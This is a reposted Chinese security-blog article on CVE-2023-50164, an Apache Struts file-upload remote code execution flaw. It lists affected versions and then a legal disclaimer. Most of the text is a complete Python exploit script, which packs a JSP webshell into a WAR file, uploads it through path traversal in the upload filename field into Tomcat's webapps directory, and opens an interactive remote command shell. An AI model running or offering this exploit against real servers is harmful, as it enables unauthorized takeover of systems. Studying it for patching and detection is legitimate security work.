CVE-2023-50164-Apache-Struts-RCE

admin
admin
admin
102707
文章
87
评论
2023年12月15日08:47:44评论33 views字数 4033阅读13分26秒阅读模式

简介

Apache Struts2 是一个开源的 Java Web 应用程序开发框架,旨在帮助开发人员构建灵活、可维护和可扩展的企业级Web应用程序。
根据最新推送,检测到Apache Struts文件上传漏洞(CVE-2023-50164)。经过分析和研判,攻击者可利用该漏洞,在特定的条件下,通过污染(越界,特殊符号,等等)相关上传参数导致任意文件上传,执行任意代码,建议及时修复。

影响范围

Struts 2.0.0-2.3.37
Strust 2.5.0-2.5.32
Strust 6.0.0-6.3.0

环境搭建

参见下方链接见搭建及其分析过程

https://xz.aliyun.com/t/13172

Poc

import osimport sysimport timeimport stringimport randomimport argparseimport requestsfrom urllib.parse import urlparse, urlunparsefrom requests_toolbelt import MultipartEncoderfrom requests.exceptions import ConnectionError
MAX_ATTEMPTS = 10DELAY_SECONDS = 1HTTP_UPLOAD_PARAM_NAME = "upload"CATALINA_HOME = "/opt/tomcat/"NAME_OF_WEBSHELL = "webshell"NAME_OF_WEBSHELL_WAR = NAME_OF_WEBSHELL + ".war"NUMBER_OF_PARENTS_IN_PATH = 2

def get_base_url(url):    parsed_url = urlparse(url)    base_url = urlunparse((parsed_url.scheme, parsed_url.netloc, "", "", "", ""))    return base_url
def create_war_file():    if not os.path.exists(NAME_OF_WEBSHELL_WAR):        os.system("jar -cvf {} {}".format(NAME_OF_WEBSHELL_WAR, NAME_OF_WEBSHELL+'.jsp'))        print("[+] WAR file created successfully.")    else:        print("[+] WAR file already exists.")
def upload_file(url):    create_war_file()
    if not os.path.exists(NAME_OF_WEBSHELL_WAR):        print("[-] ERROR: webshell.war not found in the current directory.")        exit()
    war_location = '../' * (NUMBER_OF_PARENTS_IN_PATH-1) + '..' +         CATALINA_HOME + 'webapps/' + NAME_OF_WEBSHELL_WAR
    war_file_content = open(NAME_OF_WEBSHELL_WAR, "rb").read()
    files = {        HTTP_UPLOAD_PARAM_NAME.capitalize(): ("arbitrary.txt", war_file_content, "application/octet-stream"),        HTTP_UPLOAD_PARAM_NAME+"FileName": war_location    }
    boundary = '----WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16))    m = MultipartEncoder(fields=files, boundary=boundary)    headers = {"Content-Type": m.content_type}
    try:        response = requests.post(url, headers=headers, data=m)        print(f"[+] {NAME_OF_WEBSHELL_WAR} uploaded successfully.")    except requests.RequestException as e:        print("[-] Error while uploading the WAR webshell:", e)        sys.exit(1)
def attempt_connection(url):    for attempt in range(1, MAX_ATTEMPTS + 1):        try:            r = requests.get(url)            if r.status_code == 200:                print('[+] Successfully connected to the web shell.')                return True            else:                raise Exception        except ConnectionError:            if attempt == MAX_ATTEMPTS:                print(f'[-] Maximum attempts reached. Unable to establish a connection with the web shell. Exiting...')                return False            time.sleep(DELAY_SECONDS)        except Exception:            if attempt == MAX_ATTEMPTS:                print('[-] Maximum attempts reached. Exiting...')                return False            time.sleep(DELAY_SECONDS)    return False
def start_interactive_shell(url):    if not attempt_connection(url):        sys.exit()
    while True:        try:            cmd = input("33[91mCMD33[0m > ")            if cmd == 'exit':                raise KeyboardInterrupt            r = requests.get(url + "?cmd=" + cmd, verify=False)            if r.status_code == 200:                print(r.text.replace('nn', ''))            else:                raise Exception        except KeyboardInterrupt:            sys.exit()        except ConnectionError:            print('[-] We lost our connection to the web shell. Exiting...')            sys.exit()        except:            print('[-] Something unexpected happened. Exiting...')            sys.exit()
if __name__ == "__main__":    parser = argparse.ArgumentParser(description="Exploit script for CVE-2023-50164 by uploading a webshell to a vulnerable Struts app's server.")    parser.add_argument("--url", required=True, help="Full URL of the upload endpoint.")    args = parser.parse_args()
    if not args.url.startswith("http"):        print("[-] ERROR: Invalid URL. Please provide a valid URL starting with 'http' or 'https'.")        exit()
    print("[+] Starting exploitation...")    upload_file(args.url)
    webshell_url = f"{get_base_url(args.url)}/{NAME_OF_WEBSHELL}/{NAME_OF_WEBSHELL}.jsp"    print(f"[+] Reach the JSP webshell at {webshell_url}?cmd=<COMMAND>")
    print(f"[+] Attempting a connection with webshell.")    start_interactive_shell(webshell_url)

参考链接

https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCEhttps://xz.aliyun.com/t/13172


CVE-2023-50164-Apache-Struts-RCE

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!


敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。


原文始发于微信公众号(巢安实验室):CVE-2023-50164-Apache-Struts-RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日08:47:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-50164-Apache-Struts-RCEhttp://cn-sec.com/archives/2301170.html

发表评论

匿名网友 填写信息